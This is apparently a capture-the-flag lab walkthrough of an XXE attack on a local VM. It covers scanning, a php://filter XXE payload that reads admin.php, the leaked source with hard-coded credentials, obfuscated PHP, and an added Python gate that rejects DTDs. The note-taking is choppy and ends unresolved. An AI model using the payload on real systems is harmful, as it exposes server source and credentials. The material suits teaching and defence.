ifconfig
nmap 192.168.61.0/24
Found 192.168.61.145
Directory scan (with 御剑 / Yujian)
192.168.61.145/xxe
192.168.61.145/admin.php
Not accessible, but a path listed in robots.txt is unlikely to be a dead page, so access is probably just being refused.
Capture the request sent to /xxe
The request body turns out to be XML, so test whether it is vulnerable
php://filter is used here rather than file:// because php://filter can take a relative path directly, whereas file:// needs an absolute path
On the 192.168.61.145 host, xxe and admin.php are known, but the absolute path is not
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE ANY [
<!ENTITY test SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php">
]>
<root><name>&test;</name><password>1</password></root>
```
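As an added defensive example (not from the original writeup), here is a pre-parse gate in Python that a server could place in front of the /xxe endpoint: it records whether a DTD, an external entity or a php:// / file:// wrapper appears in the request body and refuses to parse anything that declares a DTD. Both sample bodies are constructed here; the malicious one mirrors the payload shape above.

```python
import re
import xml.etree.ElementTree as ET

# Markers a request-body gate can look for before any XML parser sees the
# document. A login form never needs a DTD, so rejecting any body that
# declares one removes the whole class of bug shown in this lab.
_DOCTYPE_RE = re.compile(rb"<!DOCTYPE\b", re.IGNORECASE)
_ENTITY_RE = re.compile(
    rb"<!ENTITY\s+(\S+)\s+(SYSTEM|PUBLIC)\s+\"([^\"]*)\"", re.IGNORECASE
)
# Only the two wrappers discussed on this page are listed.
_WRAPPER_RE = re.compile(rb"\b(php|file)://", re.IGNORECASE)


def inspect_xml_body(body: bytes) -> dict:
    """Return the facts a defender would log about an inbound XML body."""
    entities = [
        (name.decode(), kind.decode().upper(), uri.decode())
        for name, kind, uri in _ENTITY_RE.findall(body)
    ]
    return {
        "has_doctype": bool(_DOCTYPE_RE.search(body)),
        "external_entities": entities,
        "wrappers": sorted({w.decode().lower() for w in _WRAPPER_RE.findall(body)}),
    }


def safe_parse(body: bytes) -> ET.Element:
    """Reject any document that carries a DTD, then parse the rest normally."""
    if inspect_xml_body(body)["has_doctype"]:
        raise ValueError("DTD not allowed on this endpoint")
    return ET.fromstring(body)


# Constructed sample bodies: the lab's payload shape and a benign login.
MALICIOUS = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE ANY [
<!ENTITY test SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php">
]>
<root><name>&test;</name><password>1</password></root>"""

BENIGN = b"""<?xml version="1.0" encoding="UTF-8"?>
<root><name>alice</name><password>hunter2</password></root>"""
```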
Decoding the base64 in the response gives:
```php
<?php
session_start();
?>


<html lang = "en">

<head>
<title>admin</title>
<link href = "css/bootstrap.min.css" rel = "stylesheet">

<style>
body {
padding-top: 40px;
padding-bottom: 40px;
background-color: #ADABAB;
}

.form-signin {
max-width: 330px;
padding: 15px;
margin: 0 auto;
color: #017572;
}

.form-signin .form-signin-heading,
.form-signin .checkbox {
margin-bottom: 10px;
}

.form-signin .checkbox {
font-weight: normal;
}

.form-signin .form-control {
position: relative;
height: auto;
-webkit-box-sizing: border-box;
-moz-box-sizing: border-box;
box-sizing: border-box;
padding: 10px;
font-size: 16px;
}

.form-signin .form-control:focus {
z-index: 2;
}

.form-signin input[type="email"] {
margin-bottom: -1px;
border-bottom-right-radius: 0;
border-bottom-left-radius: 0;
border-color:#017572;
}

.form-signin input[type="password"] {
margin-bottom: 10px;
border-top-left-radius: 0;
border-top-right-radius: 0;
border-color:#017572;
}

h2{
text-align: center;
color: #017572;
}
</style>

</head>

<body>

<h2>Enter Username and Password</h2>
<div class = "container form-signin">

<?php
$msg = '';
if (isset($_POST['login']) && !empty($_POST['username'])
&& !empty($_POST['password'])) {

// Hard-coded username and MD5 of the password; reading this file through
// the XXE is what exposes them.
if ($_POST['username'] == 'administhebest' &&
md5($_POST['password']) == 'e6e061838856bf47e1de730719fb2609') {
$_SESSION['valid'] = true;
$_SESSION['timeout'] = time();
$_SESSION['username'] = 'administhebest';

echo "You have entered valid use name and password<br />";
$flag = "Here is the Flag";
echo $flag;
}else {
$msg = 'Maybe Later';
}
}
?>
</div> <!-- W00t/W00t -->

<div class = "container">

<form class = "form-signin" role = "form"
action = "<?php /* expression lost in extraction */ ?>" method = "post">
<h4 class = "form-signin-heading"><?php echo $msg; ?></h4>
<input type = "text" class = "form-control"
name = "username"
required autofocus></br>
<input type = "password" class = "form-control"
name = "password" required>
<button class = "btn btn-lg btn-primary btn-block" type = "submit"
name = "login">Login</button>
</form>

Click here to clean <a href = "adminlog.php" title = "Logout">Session.</a>

</div>

</body>
</html>
```
The username and password both fall out of this:
administhebest
admin@123
Wrong; I tried it several times and it didn't work, so it looks like I need to find another route
Reading on through the code, this part can be seen; it is also what runs once the credentials are correct
View the source of flagmeout.php
base64 decode:
```php
$flag = "";
echo $flag;
?>
```
Looks like base32 by eye; decode it
Decode again
And there is also this:
```php
$_[]++;$_[]=$_._;$_____=$_[(++$__[])][(++$__[])+(++$__[])+(++$__[])];$_=$_[$_[+_]];$___=$__=$_[++$__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++$___.$___.++$_.$__.++$___;$__=$_;$_=$_____;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$___=+_;$___.=$__;$___=++$_^$___[+_];$À=+_;$Á=$Â=$Ã=$Ä=$Æ=$È=$É=$Ê=$Ë=++$Á[];$Â++;$Ã++;$Ã++;$Ä++;$Ä++;$Ä++;$Æ++;$Æ++;$Æ++;$Æ++;$È++;$È++;$È++;$È++;$È++;$É++;$É++;$É++;$É++;$É++;$É++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$__('$_="'.$___.$Á.$Â.$Ã.$___.$Á.$À.$Á.$___.$Á.$À.$È.$___.$Á.$À.$Ã.$___.$Á.$Â.$Ã.$___.$Á.$Â.$À.$___.$Á.$É.$Ã.$___.$Á.$É.$À.$___.$Á.$É.$À.$___.$Á.$Ä.$Æ.$___.$Á.$Ã.$É.$___.$Á.$Æ.$Á.$___.$Á.$È.$Ã.$___.$Á.$Ã.$É.$___.$Á.$È.$Ã.$___.$Á.$Æ.$É.$___.$Á.$Ã.$É.$___.$Á.$Ä.$Æ.$___.$Á.$Ä.$Á.$___.$Á.$È.$Ã.$___.$Á.$É.$Á.$___.$Á.$É.$Æ.'"');$__($_);
```
Hmm, it looks a bit like PHP; I got stuck here and forgot I could simply run the code
I don't know why it came out wrong; by rights this should have been the end